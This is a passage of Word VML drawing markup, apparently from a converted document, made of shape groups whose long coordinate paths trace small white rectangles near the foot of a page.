,13867,4121,13871,4121,13875,4121,13879,4121,13883,4121,13888,4121,13892,4121,13897,4121,13902,4121,13906,4121,13911,4121,13916,4121,13921,4121,13926,4121,13932,4121,13937,4121,13942,4121,13948,4121,13954,4121,13959,4121,13965,4121,13971,4121,13977,4121,13983,4121,13990,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4121,13996,4120,13996,4120,13996,4120,13996,4120,13996,4120,13996,4120,13996,4120,13996,4120,13996,4119,13996,4119,13996,4119,13996,4119,13996,4119,13996,4118,13996,4118,13996,4118,13996,4117,13996,4117,13996,4117,13996,4117,13996,4116,13996,4116,13996,4115,13996,4115,13996,4115,13996,4114,13996,4114,13996,4113,13996,4113,13996,4112,13996,4112,13996,4111,13996,4110,13996,4110,13996,4109,13996,4109,13996,4108,13996,4107,13996,4106,13996,4106,13996,4105,13996,4104,13996,4103,13996,4102,13996,4102,13996,4101,13996,4100,13996,4099,13996,4098,13996,4097,13996,4096,13996,4094,13996,4093,13996,4092,13996,4091,13996,4090,13996,4089,13996,4087,13996,4086,13996,4085,13996,4083,13996,4082,13996,4080,13996,4079,13996,4077,13996,4076,13996,4074,13996,4073,13996,4071,13996,4069,13996,4067,13996,4066,13996,4064,13996,4062,13996,4060,13996,4058,13996,4056,13996,4054,13996,4052,13996,4050,13996,4048,13996,4045,13996,4043,13996,4041,13996,4039,13996,4036,13996,4034,13996,4031,13996,4029,13996,4026,13996,4024,13996,4021,13996,4018,13996,4016,13996,4013,13996,4010,13996,4007,13996,4004,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13996,4001,13995,4001,13995,4001,13995,4001,13995,4001,13995,4001,13995,4001,13994,4001,13994,4001,13994,4001,13994,4001,13993,4001,13993,4001,13993,4001,13992,4001,13992,4001,13992,4001,13991,4001,13991,4001,13990,4001,13990,4001,13989,4001,13988,4001,13988,4001,13987,4001,13986,4001,13986,4001,13985,4001,13984,4001,13983,4001,13982,4001,13981,4001,13980,4001,13979,4001,13978,4001,13977,4001,13976,4001,13975,4001,13974,4001,13972,4001,13971,4001,13969,4001,13968,4001,13967,4001,13965,4001,13963,4001,13962,4001,13960,4001,13958,4001,13956,4001,13954,4001,13953,4001,13951,4001,13948,4001,13946,4001,13944,4001,13942,4001,13940,4001,13937,4001,13935,4001,13932,4001,13930,4001,13927,4001,13924,4001,13921,4001,13919,4001,13916,4001,13913,4001,13909,4001,13906,4001,13903,4001,13900,4001,13896,4001,13893,4001,13889,4001,13886,4001,13882,4001,13878,4001,13874,4001,13870,4001,13866,4001,13862,4001,13858,4001,13854,4001,13849,4001,13845,4001,13840,4001,13835,4001,13831,4001,13826,4001,13821,4001,13816,4001,13811,4001,13805,4001,13800,4001,13795,4001,13789,4001,13783,4001,13778,4001,13772,4001,13766,4001,13760,4001,13754,4001,13747,4001,13741e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:132.500pt;margin-top:718.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2650,14370" coordsize="130,270">
        <v:shape style="position:absolute;left:2650;top:14370;width:130;height:270" coordorigin="2650,14370" coordsize="130,270" path="m2665,14386l2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2665,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2666,14386,2667,14386,2667,14386,2667,14386,2667,14386,2667,14386,2667,14386,2668,14386,2668,14386,2668,14386,2668,14386,2669,14386,2669,14386,2669,14386,2670,14386,2670,14386,2670,14386,2671,14386,2671,14386,2671,14386,2672,14386,2672,14386,2673,14386,2673,14386,2674,14386,2674,14386,2675,14386,2675,14386,2676,14386,2677,14386,2677,14386,2678,14386,2679,14386,2679,14386,2680,14386,2681,14386,2682,14386,2682,14386,2683,14386,2684,14386,2685,14386,2686,14386,2687,14386,2688,14386,2689,14386,2690,14386,2691,14386,2692,14386,2693,14386,2694,14386,2695,14386,2697,14386,2698,14386,2699,14386,2700,14386,2702,14386,2703,14386,2705,14386,2706,14386,2708,14386,2709,14386,2711,14386,2712,14386,2714,14386,2716,14386,2717,14386,2719,14386,2721,14386,2723,14386,2725,14386,2726,14386,2728,14386,2730,14386,2732,14386,2734,14386,2737,14386,2739,14386,2741,14386,2743,14386,2745,14386,2748,14386,2750,14386,2753,14386,2755,14386,2758,14386,2760,14386,2763,14386,2765,14386,2768,14386,2771,14386,2774,14386,2777,14386,2779,14386,2782,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14386,2785,14387,2785,14387,2785,14387,2785,14387,2785,14387,2785,14387,2785,14387,2785,14387,2785,14387,2785,14388,2785,14388,2785,14388,2785,14388,2785,14389,2785,14389,2785,14389,2785,14390,2785,14390,2785,14390,2785,14391,2785,14391,2785,14392,2785,14392,2785,14393,2785,14393,2785,14394,2785,14395,2785,14395,2785,14396,2785,14397,2785,14397,2785,14398,2785,14399,2785,14400,2785,14401,2785,14402,2785,14403,2785,14404,2785,14405,2785,14406,2785,14408,2785,14409,2785,14410,2785,14411,2785,14413,2785,14414,2785,14416,2785,14417,2785,14419,2785,14421,2785,14422,2785,14424,2785,14426,2785,14428,2785,14430,2785,14432,2785,14434,2785,14436,2785,14438,2785,14440,2785,14443,2785,14445,2785,14448,2785,14450,2785,14453,2785,14455,2785,14458,2785,14461,2785,14464,2785,14467,2785,14470,2785,14473,2785,14476,2785,14479,2785,14483,2785,14486,2785,14489,2785,14493,2785,14497,2785,14500,2785,14504,2785,14508,2785,14512,2785,14516,2785,14520,2785,14524,2785,14529,2785,14533,2785,14538,2785,14542,2785,14547,2785,14552,2785,14557,2785,14562,2785,14567,2785,14572,2785,14577,2785,14582,2785,14588,2785,14593,2785,14599,2785,14605,2785,14611,2785,14617,2785,14623,2785,14629,2785,14635,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2785,14641,2784,14641,2784,14641,2784,14641,2784,14641,2784,14641,2784,14641,2783,14641,2783,14641,2783,14641,2783,14641,2783,14641,2782,14641,2782,14641,2782,14641,2781,14641,2781,14641,2781,14641,2780,14641,2780,14641,2780,14641,2779,14641,2779,14641,2778,14641,2778,14641,2778,14641,2777,14641,2776,14641,2776,14641,2775,14641,2775,14641,2774,14641,2774,14641,2773,14641,2772,14641,2772,14641,2771,14641,2770,14641,2769,14641,2768,14641,2768,14641,2767,14641,2766,14641,2765,14641,2764,14641,2763,14641,2762,14641,2761,14641,2760,14641,2759,14641,2758,14641,2757,14641,2755,14641,2754,14641,2753,14641,2752,14641,2750,14641,2749,14641,2748,14641,2746,14641,2745,14641,2743,14641,2742,14641,2740,14641,2738,14641,2737,14641,2735,14641,2733,14641,2732,14641,2730,14641,2728,14641,2726,14641,2724,14641,2722,14641,2720,14641,2718,14641,2716,14641,2714,14641,2712,14641,2710,14641,2708,14641,2705,14641,2703,14641,2701,14641,2698,14641,2696,14641,2693,14641,2691,14641,2688,14641,2685,14641,2683,14641,2680,14641,2677,14641,2674,14641,2671,14641,2668,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14641,2665,14640,2665,14640,2665,14640,2665,14640,2665,14640,2665,14640,2665,14639,2665,14639,2665,14639,2665,14638,2665,14638,2665,14638,2665,14637,2665,14637,2665,14636,2665,14636,2665,14635,2665,14635,2665,14634,2665,14634,2665,14633,2665,14632,2665,14632,2665,14631,2665,14630,2665,14629,2665,14628,2665,14628,2665,14627,2665,14626,2665,14625,2665,14624,2665,14622,2665,14621,2665,14620,2665,14619,2665,14618,2665,14616,2665,14615,2665,14613,2665,14612,2665,14610,2665,14609,2665,14607,2665,14605,2665,14604,2665,14602,2665,14600,2665,14598,2665,14596,2665,14594,2665,14592,2665,14589,2665,14587,2665,14585,2665,14582,2665,14580,2665,14578,2665,14575,2665,14572,2665,14570,2665,14567,2665,14564,2665,14561,2665,14558,2665,14555,2665,14552,2665,14548,2665,14545,2665,14542,2665,14538,2665,14535,2665,14531,2665,14527,2665,14523,2665,14520,2665,14516,2665,14512,2665,14507,2665,14503,2665,14499,2665,14494,2665,14490,2665,14485,2665,14481,2665,14476,2665,14471,2665,14466,2665,14461,2665,14456,2665,14451,2665,14445,2665,14440,2665,14434,2665,14429,2665,14423,2665,14417,2665,14411,2665,14405,2665,14399,2665,14393,2665,14386e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:150.500pt;margin-top:718.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3010,14370" coordsize="130,270">
        <v:shape style="position:absolute;left:3010;top:14370;width:130;height:270" coordorigin="3010,14370" coordsize="130,270" path="m3026,14386l3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3026,14386,3027,14386,3027,14386,3027,14386,3027,14386,3027,14386,3027,14386,3027,14386,3028,14386,3028,14386,3028,14386,3028,14386,3029,14386,3029,14386,3029,14386,3029,14386,3030,14386,3030,14386,3030,14386,3031,14386,3031,14386,3032,14386,3032,14386,3032,14386,3033,14386,3033,14386,3034,14386,3034,14386,3035,14386,3036,14386,3036,14386,3037,14386,3037,14386,3038,14386,3039,14386,3039,14386,3040,14386,3041,14386,3042,14386,3043,14386,3043,14386,3044,14386,3045,14386,3046,14386,3047,14386,3048,14386,3049,14386,3050,14386,3051,14386,3052,14386,3053,14386,3054,14386,3056,14386,3057,14386,3058,14386,3059,14386,3061,14386,3062,14386,3063,14386,3065,14386,3066,14386,3068,14386,3069,14386,3071,14386,3072,14386,3074,14386,3076,14386,3077,14386,3079,14386,3081,14386,3083,14386,3085,14386,3087,14386,3089,14386,3091,14386,3093,14386,3095,14386,3097,14386,3099,14386,3101,14386,3103,14386,3106,14386,3108,14386,3110,14386,3113,14386,3115,14386,3118,14386,3120,14386,3123,14386,3126,14386,3128,14386,3131,14386,3134,14386,3137,14386,3140,14386,3143,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14386,3146,14387,3146,14387,3146,14387,3146,14387,3146,14387,3146,14387,3146,14387,3146,14387,3146,14387,3146,14388,3146,14388,3146,14388,3146,14388,3146,14389,3146,14389,3146,14389,3146,14390,3146,14390,3146,14390,3146,14391,3146,14391,3146,14392,3146,14392,3146,14393,3146,14393,3146,14394,3146,14395,3146,14395,3146,14396,3146,14397,3146,14397,3146,14398,3146,14399,3146,14400,3146,14401,3146,14402,3146,14403,3146,14404,3146,14405,3146,14406,3146,14408,3146,14409,3146,14410,3146,14411,3146,14413,3146,14414,3146,14416,3146,14417,3146,14419,3146,14421,3146,14422,3146,14424,3146,14426,3146,14428,3146,14430,3146,14432,3146,14434,3146,14436,3146,14438,3146,14440,3146,14443,3146,14445,3146,14448,3146,14450,3146,14453,3146,14455,3146,14458,3146,14461,3146,14464,3146,14467,3146,14470,3146,14473,3146,14476,3146,14479,3146,14483,3146,14486,3146,14489,3146,14493,3146,14497,3146,14500,3146,14504,3146,14508,3146,14512,3146,14516,3146,14520,3146,14524,3146,14529,3146,14533,3146,14538,3146,14542,3146,14547,3146,14552,3146,14557,3146,14562,3146,14567,3146,14572,3146,14577,3146,14582,3146,14588,3146,14593,3146,14599,3146,14605,3146,14611,3146,14617,3146,14623,3146,14629,3146,14635,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3146,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3145,14641,3144,14641,3144,14641,3144,14641,3144,14641,3144,14641,3144,14641,3143,14641,3143,14641,3143,14641,3143,14641,3143,14641,3142,14641,3142,14641,3142,14641,3141,14641,3141,14641,3141,14641,3140,14641,3140,14641,3140,14641,3139,14641,3139,14641,3138,14641,3138,14641,3137,14641,3137,14641,3136,14641,3136,14641,3135,14641,3134,14641,3134,14641,3133,14641,3132,14641,3132,14641,3131,14641,3130,14641,3129,14641,3129,14641,3128,14641,3127,14641,3126,14641,3125,14641,3124,14641,3123,14641,3122,14641,3121,14641,3120,14641,3119,14641,3118,14641,3117,14641,3116,14641,3114,14641,3113,14641,3112,14641,3110,14641,3109,14641,3108,14641,3106,14641,3105,14641,3103,14641,3102,14641,3100,14641,3099,14641,3097,14641,3095,14641,3094,14641,3092,14641,3090,14641,3088,14641,3086,14641,3084,14641,3083,14641,3081,14641,3079,14641,3076,14641,3074,14641,3072,14641,3070,14641,3068,14641,3065,14641,3063,14641,3061,14641,3058,14641,3056,14641,3053,14641,3051,14641,3048,14641,3045,14641,3043,14641,3040,14641,3037,14641,3034,14641,3031,14641,3029,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14641,3026,14640,3026,14640,3026,14640,3026,14640,3026,14640,3026,14640,3026,14639,3026,14639,3026,14639,3026,14638,3026,14638,3026,14638,3026,14637,3026,14637,3026,14636,3026,14636,3026,14635,3026,14635,3026,14634,3026,14634,3026,14633,3026,14632,3026,14632,3026,14631,3026,14630,3026,14629,3026,14628,3026,14628,3026,14627,3026,14626,3026,14625,3026,14624,3026,14622,3026,14621,3026,14620,3026,14619,3026,14618,3026,14616,3026,14615,3026,14613,3026,14612,3026,14610,3026,14609,3026,14607,3026,14605,3026,14604,3026,14602,3026,14600,3026,14598,3026,14596,3026,14594,3026,14592,3026,14589,3026,14587,3026,14585,3026,14582,3026,14580,3026,14578,3026,14575,3026,14572,3026,14570,3026,14567,3026,14564,3026,14561,3026,14558,3026,14555,3026,14552,3026,14548,3026,14545,3026,14542,3026,14538,3026,14535,3026,14531,3026,14527,3026,14523,3026,14520,3026,14516,3026,14512,3026,14507,3026,14503,3026,14499,3026,14494,3026,14490,3026,14485,3026,14481,3026,14476,3026,14471,3026,14466,3026,14461,3026,14456,3026,14451,3026,14445,3026,14440,3026,14434,3026,14429,3026,14423,3026,14417,3026,14411,3026,14405,3026,14399,3026,14393,3026,14386e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:336.500pt;margin-top:718.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6730,14370" coordsize="130,270">
        <v:shape style="position:absolute;left:6730;top:14370;width:130;height:270" coordorigin="6730,14370" coordsize="130,270" path="m6747,14386l6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6747,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6748,14386,6749,14386,6749,14386,6749,14386,6749,14386,6749,14386,6749,14386,6750,14386,6750,14386,6750,14386,6750,14386,6750,14386,6751,14386,6751,14386,6751,14386,6752,14386,6752,14386,6752,14386,6753,14386,6753,14386,6753,14386,6754,14386,6754,14386,6755,14386,6755,14386,6756,14386,6756,14386,6757,14386,6757,14386,6758,14386,6759,14386,6759,14386,6760,14386,6761,14386,6761,14386,6762,14386,6763,14386,6764,14386,6764,14386,6765,14386,6766,14386,6767,14386,6768,14386,6769,14386,6770,14386,6771,14386,6772,14386,6773,14386,6774,14386,6775,14386,6776,14386,6777,14386,6779,14386,6780,14386,6781,14386,6783,14386,6784,14386,6785,14386,6787,14386,6788,14386,6790,14386,6791,14386,6793,14386,6794,14386,6796,14386,6798,14386,6799,14386,6801,14386,6803,14386,6805,14386,6807,14386,6808,14386,6810,14386,6812,14386,6814,14386,6817,14386,6819,14386,6821,14386,6823,14386,6825,14386,6828,14386,6830,14386,6832,14386,6835,14386,6837,14386,6840,14386,6842,14386,6845,14386,6847,14386,6850,14386,6853,14386,6856,14386,6859,14386,6862,14386,6864,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14386,6867,14387,6867,14387,6867,14387,6867,14387,6867,14387,6867,14387,6867,14387,6867,14387,6867,14387,6867,14388,6867,14388,6867,14388,6867,14388,6867,14389,6867,14389,6867,14389,6867,14390,6867,14390,6867,14390,6867,14391,6867,14391,6867,14392,6867,14392,6867,14393,6867,14393,6867,14394,6867,14395,6867,14395,6867,14396,6867,14397,6867,14397,6867,14398,6867,14399,6867,14400,6867,14401,6867,14402,6867,14403,6867,14404,6867,14405,6867,14406,6867,14408,6867,14409,6867,14410,6867,14411,6867,14413,6867,14414,6867,14416,6867,14417,6867,14419,6867,14421,6867,14422,6867,14424,6867,14426,6867,14428,6867,14430,6867,14432,6867,14434,6867,14436,6867,14438,6867,14440,6867,14443,6867,14445,6867,14448,6867,14450,6867,14453,6867,14455,6867,14458,6867,14461,6867,14464,6867,14467,6867,14470,6867,14473,6867,14476,6867,14479,6867,14483,6867,14486,6867,14489,6867,14493,6867,14497,6867,14500,6867,14504,6867,14508,6867,14512,6867,14516,6867,14520,6867,14524,6867,14529,6867,14533,6867,14538,6867,14542,6867,14547,6867,14552,6867,14557,6867,14562,6867,14567,6867,14572,6867,14577,6867,14582,6867,14588,6867,14593,6867,14599,6867,14605,6867,14611,6867,14617,6867,14623,6867,14629,6867,14635,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6867,14641,6866,14641,6866,14641,6866,14641,6866,14641,6866,14641,6866,14641,6866,14641,6865,14641,6865,14641,6865,14641,6865,14641,6864,14641,6864,14641,6864,14641,6864,14641,6863,14641,6863,14641,6863,14641,6862,14641,6862,14641,6861,14641,6861,14641,6861,14641,6860,14641,6860,14641,6859,14641,6859,14641,6858,14641,6857,14641,6857,14641,6856,14641,6856,14641,6855,14641,6854,14641,6854,14641,6853,14641,6852,14641,6851,14641,6850,14641,6850,14641,6849,14641,6848,14641,6847,14641,6846,14641,6845,14641,6844,14641,6843,14641,6842,14641,6841,14641,6840,14641,6839,14641,6837,14641,6836,14641,6835,14641,6834,14641,6832,14641,6831,14641,6830,14641,6828,14641,6827,14641,6825,14641,6824,14641,6822,14641,6821,14641,6819,14641,6817,14641,6816,14641,6814,14641,6812,14641,6810,14641,6808,14641,6806,14641,6804,14641,6802,14641,6800,14641,6798,14641,6796,14641,6794,14641,6792,14641,6790,14641,6787,14641,6785,14641,6783,14641,6780,14641,6778,14641,6775,14641,6773,14641,6770,14641,6767,14641,6765,14641,6762,14641,6759,14641,6756,14641,6753,14641,6750,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14641,6747,14640,6747,14640,6747,14640,6747,14640,6747,14640,6747,14640,6747,14639,6747,14639,6747,14639,6747,14638,6747,14638,6747,14638,6747,14637,6747,14637,6747,14636,6747,14636,6747,14635,6747,14635,6747,14634,6747,14634,6747,14633,6747,14632,6747,14632,6747,14631,6747,14630,6747,14629,6747,14628,6747,14628,6747,14627,6747,14626,6747,14625,6747,14624,6747,14622,6747,14621,6747,14620,6747,14619,6747,14618,6747,14616,6747,14615,6747,14613,6747,14612,6747,14610,6747,14609,6747,14607,6747,14605,6747,14604,6747,14602,6747,14600,6747,14598,6747,14596,6747,14594,6747,14592,6747,14589,6747,14587,6747,14585,6747,14582,6747,14580,6747,14578,6747,14575,6747,14572,6747,14570,6747,14567,6747,14564,6747,14561,6747,14558,6747,14555,6747,14552,6747,14548,6747,14545,6747,14542,6747,14538,6747,14535,6747,14531,6747,14527,6747,14523,6747,14520,6747,14516,6747,14512,6747,14507,6747,14503,6747,14499,6747,14494,6747,14490,6747,14485,6747,14481,6747,14476,6747,14471,6747,14466,6747,14461,6747,14456,6747,14451,6747,14445,6747,14440,6747,14434,6747,14429,6747,14423,6747,14417,6747,14411,6747,14405,6747,14399,6747,14393,6747,14386e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:229.500pt;margin-top:731.500pt;width:12.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4590,14630" coordsize="250,270">
        <v:shape style="position:absolute;left:4590;top:14630;width:250;height:270" coordorigin="4590,14630" coordsize="250,270" path="m4601,14656l4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4601,14656,4602,14656,4602,14656,4602,14656,4602,14656,4602,14656,4602,14656,4602,14656,4602,14656,4602,14656,4602,14656,4603,14656,4603,14656,4603,14656,4603,14656,4604,14656,4604,14656,4604,14656,4604,14656,4605,14656,4605,14656,4606,14656,4606,14656,4606,14656,4607,14656,4607,14656,4608,14656,4609,14656,4609,14656,4610,14656,4610,14656,4611,14656,4612,14656,4613,14656,4613,14656,4614,14656,4615,14656,4616,14656,4617,14656,4618,14656,4619,14656,4620,14656,4621,14656,4623,14656,4624,14656,4625,14656,4626,14656,4628,14656,4629,14656,4631,14656,4632,14656,4634,14656,4635,14656,4637,14656,4639,14656,4640,14656,4642,14656,4644,14656,4646,14656,4648,14656,4650,14656,4652,14656,4655,14656,4657,14656,4659,14656,4661,14656,4664,14656,4666,14656,4669,14656,4672,14656,4674,14656,4677,14656,4680,14656,4683,14656,4686,14656,4689,14656,4692,14656,4695,14656,4698,14656,4702,14656,4705,14656,4709,14656,4712,14656,4716,14656,4720,14656,4723,14656,4727,14656,4731,14656,4735,14656,4740,14656,4744,14656,4748,14656,4753,14656,4757,14656,4762,14656,4766,14656,4771,14656,4776,14656,4781,14656,4786,14656,4791,14656,4796,14656,4802,14656,4807,14656,4812,14656,4818,14656,4824,14656,4830,14656,4835,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14656,4841,14657,4841,14657,4841,14657,4841,14657,4841,14657,4841,14657,4841,14657,4841,14657,4841,14657,4841,14657,4841,14658,4841,14658,4841,14658,4841,14658,4841,14658,4841,14659,4841,14659,4841,14659,4841,14660,4841,14660,4841,14660,4841,14661,4841,14661,4841,14662,4841,14662,4841,14663,4841,14663,4841,14664,4841,14665,4841,14665,4841,14666,4841,14667,4841,14668,4841,14668,4841,14669,4841,14670,4841,14671,4841,14672,4841,14673,4841,14674,4841,14675,4841,14676,4841,14678,4841,14679,4841,14680,4841,14682,4841,14683,4841,14684,4841,14686,4841,14687,4841,14689,4841,14691,4841,14692,4841,14694,4841,14696,4841,14698,4841,14700,4841,14702,4841,14704,4841,14706,4841,14708,4841,14711,4841,14713,4841,14715,4841,14718,4841,14720,4841,14723,4841,14726,4841,14728,4841,14731,4841,14734,4841,14737,4841,14740,4841,14743,4841,14746,4841,14749,4841,14753,4841,14756,4841,14760,4841,14763,4841,14767,4841,14770,4841,14774,4841,14778,4841,14782,4841,14786,4841,14790,4841,14795,4841,14799,4841,14803,4841,14808,4841,14812,4841,14817,4841,14822,4841,14827,4841,14832,4841,14837,4841,14842,4841,14847,4841,14852,4841,14858,4841,14863,4841,14869,4841,14875,4841,14881,4841,14887,4841,14893,4841,14899,4841,14905,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4841,14912,4840,14912,4840,14912,4840,14912,4840,14912,4840,14912,4839,14912,4839,14912,4839,14912,4839,14912,4838,14912,4838,14912,4838,14912,4837,14912,4837,14912,4836,14912,4836,14912,4835,14912,4835,14912,4834,14912,4834,14912,4833,14912,4832,14912,4832,14912,4831,14912,4830,14912,4829,14912,4828,14912,4828,14912,4827,14912,4826,14912,4825,14912,4824,14912,4823,14912,4821,14912,4820,14912,4819,14912,4818,14912,4816,14912,4815,14912,4814,14912,4812,14912,4811,14912,4809,14912,4807,14912,4806,14912,4804,14912,4802,14912,4800,14912,4799,14912,4797,14912,4795,14912,4793,14912,4790,14912,4788,14912,4786,14912,4784,14912,4781,14912,4779,14912,4776,14912,4774,14912,4771,14912,4768,14912,4766,14912,4763,14912,4760,14912,4757,14912,4754,14912,4751,14912,4748,14912,4744,14912,4741,14912,4738,14912,4734,14912,4730,14912,4727,14912,4723,14912,4719,14912,4715,14912,4711,14912,4707,14912,4703,14912,4699,14912,4695,14912,4690,14912,4686,14912,4681,14912,4676,14912,4672,14912,4667,14912,4662,14912,4657,14912,4652,14912,4647,14912,4641,14912,4636,14912,4630,14912,4625,14912,4619,14912,4613,14912,4607,14912,4601,14912,4601,14912,4601,14912,4601,14912,4601,14912,4601,14912,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14911,4601,14910,4601,14910,4601,14910,4601,14910,4601,14910,4601,14909,4601,14909,4601,14909,4601,14909,4601,14908,4601,14908,4601,14907,4601,14907,4601,14907,4601,14906,4601,14906,4601,14905,4601,14904,4601,14904,4601,14903,4601,14903,4601,14902,4601,14901,4601,14900,4601,14899,4601,14899,4601,14898,4601,14897,4601,14896,4601,14895,4601,14894,4601,14893,4601,14891,4601,14890,4601,14889,4601,14888,4601,14886,4601,14885,4601,14883,4601,14882,4601,14880,4601,14879,4601,14877,4601,14875,4601,14874,4601,14872,4601,14870,4601,14868,4601,14866,4601,14864,4601,14862,4601,14860,4601,14857,4601,14855,4601,14853,4601,14850,4601,14848,4601,14845,4601,14842,4601,14840,4601,14837,4601,14834,4601,14831,4601,14828,4601,14825,4601,14822,4601,14819,4601,14815,4601,14812,4601,14808,4601,14805,4601,14801,4601,14797,4601,14794,4601,14790,4601,14786,4601,14782,4601,14778,4601,14773,4601,14769,4601,14765,4601,14760,4601,14756,4601,14751,4601,14746,4601,14741,4601,14736,4601,14731,4601,14726,4601,14721,4601,14715,4601,14710,4601,14704,4601,14699,4601,14693,4601,14687,4601,14681,4601,14675,4601,14669,4601,14663,4601,14656e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:463.500pt;margin-top:731.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9270,14630" coordsize="130,270">
        <v:shape style="position:absolute;left:9270;top:14630;width:130;height:270" coordorigin="9270,14630" coordsize="130,270" path="m9284,14656l9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9284,14656,9285,14656,9285,14656,9285,14656,9285,14656,9285,14656,9285,14656,9285,14656,9286,14656,9286,14656,9286,14656,9286,14656,9286,14656,9287,14656,9287,14656,9287,14656,9288,14656,9288,14656,9288,14656,9289,14656,9289,14656,9289,14656,9290,14656,9290,14656,9291,14656,9291,14656,9292,14656,9292,14656,9293,14656,9293,14656,9294,14656,9294,14656,9295,14656,9296,14656,9296,14656,9297,14656,9298,14656,9298,14656,9299,14656,9300,14656,9301,14656,9301,14656,9302,14656,9303,14656,9304,14656,9305,14656,9306,14656,9307,14656,9308,14656,9309,14656,9310,14656,9311,14656,9313,14656,9314,14656,9315,14656,9316,14656,9317,14656,9319,14656,9320,14656,9322,14656,9323,14656,9324,14656,9326,14656,9327,14656,9329,14656,9331,14656,9332,14656,9334,14656,9336,14656,9337,14656,9339,14656,9341,14656,9343,14656,9345,14656,9347,14656,9349,14656,9351,14656,9353,14656,9355,14656,9357,14656,9359,14656,9362,14656,9364,14656,9366,14656,9369,14656,9371,14656,9373,14656,9376,14656,9379,14656,9381,14656,9384,14656,9386,14656,9389,14656,9392,14656,